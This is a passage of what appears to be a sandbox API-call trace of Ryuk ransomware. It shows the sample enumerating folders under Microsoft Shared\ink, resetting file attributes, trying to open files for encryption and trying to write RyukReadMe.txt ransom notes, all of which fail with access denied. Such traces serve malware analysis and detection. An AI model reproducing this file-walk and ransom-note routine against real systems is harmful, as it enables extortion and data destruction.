returned 0xffffffffffffffff [0131.622] GetLastError () returned 0x5 [0131.622] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.622] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.622] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.622] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", dwFileAttributes=0x80) returned 0 [0131.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.623] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.623] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.623] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.623] SetLastError (dwErrCode=0x0) [0131.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.623] GetLastError () returned 0x5 [0131.623] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.623] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.623] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.624] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.624] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.624] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.624] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", dwFileAttributes=0x80) returned 0 [0131.625] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.625] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.625] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.625] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.625] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.626] SetLastError (dwErrCode=0x0) [0131.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.626] GetLastError () returned 0x5 [0131.626] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.626] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.626] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.626] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.626] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", dwFileAttributes=0x80) returned 0 [0131.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.626] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.626] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.627] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.627] SetLastError (dwErrCode=0x0) [0131.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.627] GetLastError () returned 0x5 [0131.627] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.627] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.627] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.627] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.627] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.627] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.627] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", dwFileAttributes=0x80) returned 0 [0131.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.627] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.627] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.628] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.628] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.628] SetLastError (dwErrCode=0x0) [0131.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.628] GetLastError () returned 0x5 [0131.628] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.628] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.628] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.628] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.628] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", dwFileAttributes=0x80) returned 0 [0131.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.629] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.629] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.629] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.629] SetLastError (dwErrCode=0x0) [0131.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.629] GetLastError () returned 0x5 [0131.629] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.629] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.629] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.629] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.629] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.629] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", dwFileAttributes=0x80) returned 0 [0131.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.630] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.630] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.630] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.631] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.631] SetLastError (dwErrCode=0x0) [0131.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.631] GetLastError () returned 0x5 [0131.631] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.631] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.631] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", dwFileAttributes=0x80) returned 0 [0131.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.631] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.631] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.631] SetLastError (dwErrCode=0x0) [0131.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.632] GetLastError () returned 0x5 [0131.632] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.632] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.632] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.632] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.632] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.632] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.632] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", dwFileAttributes=0x80) returned 0 [0131.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.632] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.632] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.633] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.633] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", dwFileAttributes=0x80) returned 0 [0131.633] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.633] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.634] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.634] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.634] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", dwFileAttributes=0x80) returned 0 [0131.634] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.634] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.634] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.634] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.634] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.634] SetLastError (dwErrCode=0x0) [0131.634] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.634] GetLastError () returned 0x5 [0131.634] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.634] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.635] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.635] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.635] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", dwFileAttributes=0x80) returned 0 [0131.635] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.635] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.635] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.636] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.636] SetLastError (dwErrCode=0x0) [0131.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.636] GetLastError () returned 0x5 [0131.636] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.636] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.636] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.637] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.637] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.637] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", dwFileAttributes=0x80) returned 0 [0131.641] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.641] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.641] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.641] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.641] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.642] SetLastError (dwErrCode=0x0) [0131.642] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.642] GetLastError () returned 0x5 [0131.642] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.642] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.642] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.642] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", dwFileAttributes=0x80) returned 0 [0131.642] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.642] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.642] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.642] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.642] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.642] SetLastError (dwErrCode=0x0) [0131.642] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.643] GetLastError () returned 0x5 [0131.643] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.643] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.643] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.643] SetLastError (dwErrCode=0x0) [0131.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.643] GetLastError () returned 0x5 [0131.643] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.643] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.643] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.643] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.643] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.643] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.643] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.643] SetLastError (dwErrCode=0x0) [0131.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.643] GetLastError () returned 0x5 [0131.643] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: 